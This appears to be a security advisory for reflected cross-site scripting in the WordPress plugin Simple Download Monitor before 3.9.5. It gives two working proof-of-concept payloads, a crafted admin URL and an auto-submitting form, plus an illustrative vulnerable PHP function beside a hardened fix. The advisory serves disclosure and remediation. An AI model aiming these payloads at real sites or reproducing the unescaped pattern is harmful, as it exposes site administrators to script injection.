Simple Download Monitor < 3.9.5 - Reflected Cross-Site Scripting
Description
The plugin does not escape 1) the sdm_active_tab GET parameter and 2) the sdm_stats_start_date/sdm_stats_end_date POST parameters before outputting them back inside HTML attributes, leading to Reflected Cross-Site Scripting issues.
Proof of Concept
PoC 1: This requires Firefox due to the onclick+accesskey trick on a hidden input. There is another injection point, but magic quotes are doing their job (it's inside badly-enqueued inline JS).
1) Go to https://example.com/wp-admin/edit.php?post_type=sdm_downloads&page=sdm-stats&sdm_active_tab=browserList%22+accesskey%3DA+onclick%3Dalert%28origin%29%2F%2F
2) Press Alt-Shift-A (Windows) or Cmd-Alt-A (macOS)

PoC 2: This does not have a browser requirement.
<form action="https://example.com/wp-admin/edit.php?post_type=sdm_downloads&page=sdm-stats&sdm_active_tab=browserList" method="post" id="xss">
<input type="hidden" name="sdm_stats_start_date" value="" style=animation-name:rotation onanimationend=alert(origin)//">
</form>
<script>xss.submit()</script>
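The root cause named in the description is request data written into attribute values without context-aware escaping. The following PHP is an added illustration, not code from the Simple Download Monitor plugin: a hypothetical tab renderer (`sdm_demo_render_tab_vulnerable`) that reproduces the unescaped pattern, beside a hardened version (`sdm_demo_render_tab_hardened`) that validates the tab name against a constructed allowlist, normalises the date, and escapes each value for its exact output context at the point of output. It assumes it runs inside a loaded WordPress install so that `wp_unslash()`, `sanitize_text_field()`, `esc_attr()`, `esc_url()`, `add_query_arg()`, `admin_url()` and `wp_json_encode()` are available; the tab names in the allowlist are assumptions.

```php
<?php
// Added example, not the plugin's own code. Assumes WordPress core is loaded.

// --- Vulnerable pattern (hypothetical reconstruction of the class of bug described) ---
function sdm_demo_render_tab_vulnerable() {
    $tab        = isset( $_GET['sdm_active_tab'] ) ? $_GET['sdm_active_tab'] : 'overview';
    $start_date = isset( $_POST['sdm_stats_start_date'] ) ? $_POST['sdm_stats_start_date'] : '';

    // Raw request values are concatenated straight into attribute values. A double quote
    // in the input terminates the attribute, and whatever follows becomes new attributes
    // on the element, which is exactly the reflected XSS the advisory reports.
    echo '<a class="nav-tab" href="?post_type=sdm_downloads&page=sdm-stats&sdm_active_tab=' . $tab . '">Browsers</a>';
    echo '<input type="hidden" name="sdm_stats_start_date" value="' . $start_date . '">';
}

// --- Hardened pattern ---
function sdm_demo_render_tab_hardened() {
    // 1. Validate where the value space is known: the tab name can only be one of a fixed set.
    //    (The list below is constructed for this example.) in_array() with strict comparison
    //    keeps the check case-sensitive and type-safe.
    $allowed_tabs = array( 'overview', 'browserList', 'countryList' );
    $tab = isset( $_GET['sdm_active_tab'] ) ? (string) wp_unslash( $_GET['sdm_active_tab'] ) : 'overview';
    if ( ! in_array( $tab, $allowed_tabs, true ) ) {
        $tab = 'overview';
    }

    // 2. Normalise free-form input to the shape the feature actually needs (a YYYY-MM-DD date).
    //    wp_unslash() removes the slashes WordPress adds to superglobals; sanitize_text_field()
    //    strips tags and control characters; the regex rejects anything that is not a date.
    $start_date = isset( $_POST['sdm_stats_start_date'] )
        ? sanitize_text_field( wp_unslash( $_POST['sdm_stats_start_date'] ) )
        : '';
    if ( ! preg_match( '/^\d{4}-\d{2}-\d{2}$/', $start_date ) ) {
        $start_date = '';
    }

    // 3. Escape for the exact output context, at the moment of output.
    //    esc_url() for href values, esc_attr() for ordinary attribute values.
    $url = add_query_arg(
        array( 'post_type' => 'sdm_downloads', 'page' => 'sdm-stats', 'sdm_active_tab' => $tab ),
        admin_url( 'edit.php' )
    );
    echo '<a class="nav-tab" href="' . esc_url( $url ) . '">Browsers</a>';
    echo '<input type="hidden" name="sdm_stats_start_date" value="' . esc_attr( $start_date ) . '">';

    // 4. If a value must reach inline JavaScript (the second injection point the researcher
    //    mentions), hand it over as a JSON literal rather than string-concatenating it into script text.
    echo '<script>var sdmStatsStart = ' . wp_json_encode( $start_date ) . ';</script>';
}
```

The allowlist in step 1 is the strongest control for the tab parameter because it removes any attacker-chosen bytes before they reach the page; escaping in step 3 is still applied so the code stays safe if the allowlist is later relaxed. For the date fields, which cannot be allowlisted, the shape check plus `esc_attr()` at output is the relevant fix. A quick regression check for this class of bug is to request the admin page with a parameter value containing `"` and confirm the response contains `&quot;` (or nothing) rather than a raw quote inside the attribute.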
Classification
Type: XSS
Miscellaneous
Original Researcher: apple502j
Submitter: apple502j
Verified: Yes
Timeline
Publicly Published: 2021-10-05
Added: 2021-10-05
Last Updated: 2022-04-15